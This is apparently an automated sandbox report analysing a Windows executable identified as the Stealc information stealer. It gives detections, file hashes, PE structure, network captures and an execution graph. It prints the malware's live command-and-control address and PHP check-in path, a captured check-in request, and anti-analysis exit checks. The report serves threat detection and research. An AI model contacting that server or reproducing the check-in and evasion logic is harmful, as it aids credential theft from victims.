                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe50%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37t=file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpSgfile.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/Zgfile.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1523652
                            Start date and time:2024-10-01 22:15:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 44s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 84
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947730601044701
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'838'080 bytes
                            MD5:7c170238c3fdf496e5420134b8f2c1e6
                            SHA1:45c78f3c1f17a5cb39fe957ee144b69c6fc81211
                            SHA256:33cbd0e0fa5ac49cb28c3f095077c7b82cc6127d78a0024eff5e5d9f3fc12029
                            SHA512:af3366534e37f3aab1823a121fe88f2176c1ea64c7f940de4063a69551a118629f7832f7171cf4f88e076c6d6a04d9d5a96aa3493f447d54d961cec420491fac
                            SSDEEP:49152:KZJAJB41PcUGRVoEDXVfi60LGv6zk565Po:CAQhcUGUEDXVfauT4P
                            TLSH:708533D59103D17ACCC7057069B72381AF68A31C03B8067AAE57E53C9CBE359F4A297E
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa97000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F8F355488DAh
                            pminsw mm3, qword ptr [ebx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [esi], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or byte ptr [eax+00000000h], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edi], bh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [esi], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x228001d145ffa019b1e7a2b3c58db8c63a517unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x29d0000x2005e5ed1405f8b4c5eaef3e696fc964ca4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            egzmbzjx0x4fb0000x19b0000x19a800c3072fa448b6439e85e69b10e43a93aeFalse0.9948495546589525data7.953232696533616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            cqfrfmzh0x6960000x10000x6009e5854bea59eeab5892a4ee31cb6a210False0.54296875data4.849458066052131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6970000x30000x2200d32e56a9c0be527f0b65067fd536b997False0.0764016544117647DOS executable (COM)0.9973801061828198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-01T22:16:04.772466+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649710185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 1, 2024 22:16:03.769099951 CEST4971080192.168.2.6185.215.113.37
                            Oct 1, 2024 22:16:03.775650024 CEST8049710185.215.113.37192.168.2.6
                            Oct 1, 2024 22:16:03.775727987 CEST4971080192.168.2.6185.215.113.37
                            Oct 1, 2024 22:16:03.776442051 CEST4971080192.168.2.6185.215.113.37
                            Oct 1, 2024 22:16:03.783281088 CEST8049710185.215.113.37192.168.2.6
                            Oct 1, 2024 22:16:04.534317017 CEST8049710185.215.113.37192.168.2.6
                            Oct 1, 2024 22:16:04.534387112 CEST4971080192.168.2.6185.215.113.37
                            Oct 1, 2024 22:16:04.537627935 CEST4971080192.168.2.6185.215.113.37
                            Oct 1, 2024 22:16:04.546217918 CEST8049710185.215.113.37192.168.2.6
                            Oct 1, 2024 22:16:04.772377968 CEST8049710185.215.113.37192.168.2.6
                            Oct 1, 2024 22:16:04.772465944 CEST4971080192.168.2.6185.215.113.37
                            Oct 1, 2024 22:16:07.230508089 CEST4971080192.168.2.6185.215.113.37

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 1, 2024 22:16:21.270625114 CEST53556631.1.1.1192.168.2.6

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649710185.215.113.37806200C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 1, 2024 22:16:03.776442051 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 1, 2024 22:16:04.534317017 CEST203INHTTP/1.1 200 OK
                            Date: Tue, 01 Oct 2024 20:16:04 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 1, 2024 22:16:04.537627935 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE
                            Host: 185.215.113.37
                            Content-Length: 210
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 39 36 41 31 32 44 31 45 39 45 34 38 37 32 35 36 33 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a
                            Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="hwid"D596A12D1E9E487256326------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="build"doma------KFBGDBFBKKJECBFHDGIE--
                            Oct 1, 2024 22:16:04.772377968 CEST210INHTTP/1.1 200 OK
                            Date: Tue, 01 Oct 2024 20:16:04 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:16:16:00
                            Start date:01/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xff0000
                            File size:1'838'080 bytes
                            MD5 hash:7C170238C3FDF496E5420134B8F2C1E6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13205 10069f0 13250 ff2260 13205->13250 13229 1006a64 13230 100a9b0 4 API calls 13229->13230 13231 1006a6b 13230->13231 13232 100a9b0 4 API calls 13231->13232 13233 1006a72 13232->13233 13234 100a9b0 4 API calls 13233->13234 13235 1006a79 13234->13235 13236 100a9b0 4 API calls 13235->13236 13237 1006a80 13236->13237 13402 100a8a0 13237->13402 13239 1006b0c 13406 1006920 GetSystemTime 13239->13406 13241 1006a89 13241->13239 13243 1006ac2 OpenEventA 13241->13243 13245 1006af5 CloseHandle Sleep 13243->13245 13246 1006ad9 13243->13246 13247 1006b0a 13245->13247 13249 1006ae1 CreateEventA 13246->13249 13247->13241 13249->13239 13603 ff45c0 13250->13603 13252 ff2274 13253 ff45c0 2 API calls 13252->13253 13254 ff228d 13253->13254 13255 ff45c0 2 API calls 13254->13255 13256 ff22a6 13255->13256 13257 ff45c0 2 API calls 13256->13257 13258 ff22bf 13257->13258 13259 ff45c0 2 API calls 13258->13259 13260 ff22d8 13259->13260 13261 ff45c0 2 API calls 13260->13261 13262 ff22f1 13261->13262 13263 ff45c0 2 API calls 13262->13263 13264 ff230a 13263->13264 13265 ff45c0 2 API calls 13264->13265 13266 ff2323 13265->13266 13267 ff45c0 2 API calls 13266->13267 13268 ff233c 13267->13268 13269 ff45c0 2 API calls 13268->13269 13270 ff2355 13269->13270 13271 ff45c0 2 API calls 13270->13271 13272 ff236e 13271->13272 13273 ff45c0 2 API calls 13272->13273 13274 ff2387 13273->13274 13275 ff45c0 2 API calls 13274->13275 13276 ff23a0 13275->13276 13277 ff45c0 2 API calls 13276->13277 13278 ff23b9 13277->13278 13279 ff45c0 2 API calls 13278->13279 13280 ff23d2 13279->13280 13281 ff45c0 2 API calls 13280->13281 13282 ff23eb 13281->13282 13283 ff45c0 2 API calls 13282->13283 13284 ff2404 13283->13284 13285 ff45c0 2 API calls 13284->13285 13286 ff241d 13285->13286 13287 ff45c0 2 API calls 13286->13287 13288 ff2436 13287->13288 13289 ff45c0 2 API calls 13288->13289 13290 ff244f 13289->13290 13291 ff45c0 2 API calls 13290->13291 13292 ff2468 13291->13292 13293 ff45c0 2 API calls 13292->13293 13294 ff2481 13293->13294 13295 ff45c0 2 API calls 13294->13295 13296 ff249a 13295->13296 13297 ff45c0 2 API calls 13296->13297 13298 ff24b3 13297->13298 13299 ff45c0 2 API calls 13298->13299 13300 ff24cc 13299->13300 13301 ff45c0 2 API calls 13300->13301 13302 ff24e5 13301->13302 13303 ff45c0 2 API calls 13302->13303 13304 ff24fe 13303->13304 13305 ff45c0 2 API calls 13304->13305 13306 ff2517 13305->13306 13307 ff45c0 2 API calls 13306->13307 13308 ff2530 13307->13308 13309 ff45c0 2 API calls 13308->13309 13310 ff2549 13309->13310 13311 ff45c0 2 API calls 13310->13311 13312 ff2562 13311->13312 13313 ff45c0 2 API calls 13312->13313 13314 ff257b 13313->13314 13315 ff45c0 2 API calls 13314->13315 13316 ff2594 13315->13316 13317 ff45c0 2 API calls 13316->13317 13318 ff25ad 13317->13318 13319 ff45c0 2 API calls 13318->13319 13320 ff25c6 13319->13320 13321 ff45c0 2 API calls 13320->13321 13322 ff25df 13321->13322 13323 ff45c0 2 API calls 13322->13323 13324 ff25f8 13323->13324 13325 ff45c0 2 API calls 13324->13325 13326 ff2611 13325->13326 13327 ff45c0 2 API calls 13326->13327 13328 ff262a 13327->13328 13329 ff45c0 2 API calls 13328->13329 13330 ff2643 13329->13330 13331 ff45c0 2 API calls 13330->13331 13332 ff265c 13331->13332 13333 ff45c0 2 API calls 13332->13333 13334 ff2675 13333->13334 13335 ff45c0 2 API calls 13334->13335 13336 ff268e 13335->13336 13337 1009860 13336->13337 13608 1009750 GetPEB 13337->13608 13339 1009868 13340 1009a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13339->13340 13341 100987a 13339->13341 13342 1009af4 GetProcAddress 13340->13342 13343 1009b0d 13340->13343 13344 100988c 21 API calls 13341->13344 13342->13343 13345 1009b46 13343->13345 13346 1009b16 GetProcAddress GetProcAddress 13343->13346 13344->13340 13347 1009b68 13345->13347 13348 1009b4f GetProcAddress 13345->13348 13346->13345 13349 1009b71 GetProcAddress 13347->13349 13350 1009b89 13347->13350 13348->13347 13349->13350 13351 1006a00 13350->13351 13352 1009b92 GetProcAddress GetProcAddress 13350->13352 13353 100a740 13351->13353 13352->13351 13354 100a750 13353->13354 13355 1006a0d 13354->13355 13356 100a77e lstrcpy 13354->13356 13357 ff11d0 13355->13357 13356->13355 13358 ff11e8 13357->13358 13359 ff120f ExitProcess 13358->13359 13360 ff1217 13358->13360 13361 ff1160 GetSystemInfo 13360->13361 13362 ff117c ExitProcess 13361->13362 13363 ff1184 13361->13363 13364 ff1110 GetCurrentProcess VirtualAllocExNuma 13363->13364 13365 ff1149 13364->13365 13366 ff1141 ExitProcess 13364->13366 13609 ff10a0 VirtualAlloc 13365->13609 13369 ff1220 13613 10089b0 13369->13613 13372 ff1249 __aulldiv 13373 ff129a 13372->13373 13374 ff1292 ExitProcess 13372->13374 13375 1006770 GetUserDefaultLangID 13373->13375 13376 1006792 13375->13376 13377 10067d3 13375->13377 13376->13377 13378 10067c1 ExitProcess 13376->13378 13379 10067a3 ExitProcess 13376->13379 13380 10067b7 ExitProcess 13376->13380 13381 10067cb ExitProcess 13376->13381 13382 10067ad ExitProcess 13376->13382 13383 ff1190 13377->13383 13384 10078e0 3 API calls 13383->13384 13386 ff119e 13384->13386 13385 ff11cc 13390 1007850 GetProcessHeap RtlAllocateHeap GetUserNameA 13385->13390 13386->13385 13387 1007850 3 API calls 13386->13387 13388 ff11b7 13387->13388 13388->13385 13389 ff11c4 ExitProcess 13388->13389 13391 1006a30 13390->13391 13392 10078e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13391->13392 13393 1006a43 13392->13393 13394 100a9b0 13393->13394 13615 100a710 13394->13615 13396 100a9c1 lstrlen 13397 100a9e0 13396->13397 13398 100aa18 13397->13398 13400 100a9fa lstrcpy lstrcat 13397->13400 13616 100a7a0 13398->13616 13400->13398 13401 100aa24 13401->13229 13403 100a8bb 13402->13403 13404 100a90b 13403->13404 13405 100a8f9 lstrcpy 13403->13405 13404->13241 13405->13404 13620 1006820 13406->13620 13408 100698e 13409 1006998 sscanf 13408->13409 13649 100a800 13409->13649 13411 10069aa SystemTimeToFileTime SystemTimeToFileTime 13412 10069e0 13411->13412 13413 10069ce 13411->13413 13415 1005b10 13412->13415 13413->13412 13414 10069d8 ExitProcess 13413->13414 13416 1005b1d 13415->13416 13417 100a740 lstrcpy 13416->13417 13418 1005b2e 13417->13418 13651 100a820 lstrlen 13418->13651 13421 100a820 2 API calls 13422 1005b64 13421->13422 13423 100a820 2 API calls 13422->13423 13424 1005b74 13423->13424 13655 1006430 13424->13655 13427 100a820 2 API calls 13428 1005b93 13427->13428 13429 100a820 2 API calls 13428->13429 13430 1005ba0 13429->13430 13431 100a820 2 API calls 13430->13431 13432 1005bad 13431->13432 13433 100a820 2 API calls 13432->13433 13434 1005bf9 13433->13434 13664 ff26a0 13434->13664 13442 1005cc3 13443 1006430 lstrcpy 13442->13443 13444 1005cd5 13443->13444 13445 100a7a0 lstrcpy 13444->13445 13446 1005cf2 13445->13446 13447 100a9b0 4 API calls 13446->13447 13448 1005d0a 13447->13448 13449 100a8a0 lstrcpy 13448->13449 13450 1005d16 13449->13450 13451 100a9b0 4 API calls 13450->13451 13452 1005d3a 13451->13452 13453 100a8a0 lstrcpy 13452->13453 13454 1005d46 13453->13454 13455 100a9b0 4 API calls 13454->13455 13456 1005d6a 13455->13456 13457 100a8a0 lstrcpy 13456->13457 13458 1005d76 13457->13458 13459 100a740 lstrcpy 13458->13459 13460 1005d9e 13459->13460 14390 1007500 GetWindowsDirectoryA 13460->14390 13463 100a7a0 lstrcpy 13464 1005db8 13463->13464 14400 ff4880 13464->14400 13466 1005dbe 14545 10017a0 13466->14545 13468 1005dc6 13469 100a740 lstrcpy 13468->13469 13470 1005de9 13469->13470 13471 ff1590 lstrcpy 13470->13471 13472 1005dfd 13471->13472 14561 ff5960 13472->14561 13474 1005e03 14705 1001050 13474->14705 13476 1005e0e 13477 100a740 lstrcpy 13476->13477 13478 1005e32 13477->13478 13479 ff1590 lstrcpy 13478->13479 13480 1005e46 13479->13480 13481 ff5960 34 API calls 13480->13481 13482 1005e4c 13481->13482 14709 1000d90 13482->14709 13484 1005e57 13485 100a740 lstrcpy 13484->13485 13486 1005e79 13485->13486 13487 ff1590 lstrcpy 13486->13487 13488 1005e8d 13487->13488 13489 ff5960 34 API calls 13488->13489 13490 1005e93 13489->13490 14716 1000f40 13490->14716 13492 1005e9e 13493 ff1590 lstrcpy 13492->13493 13494 1005eb5 13493->13494 14721 1001a10 13494->14721 13496 1005eba 13497 100a740 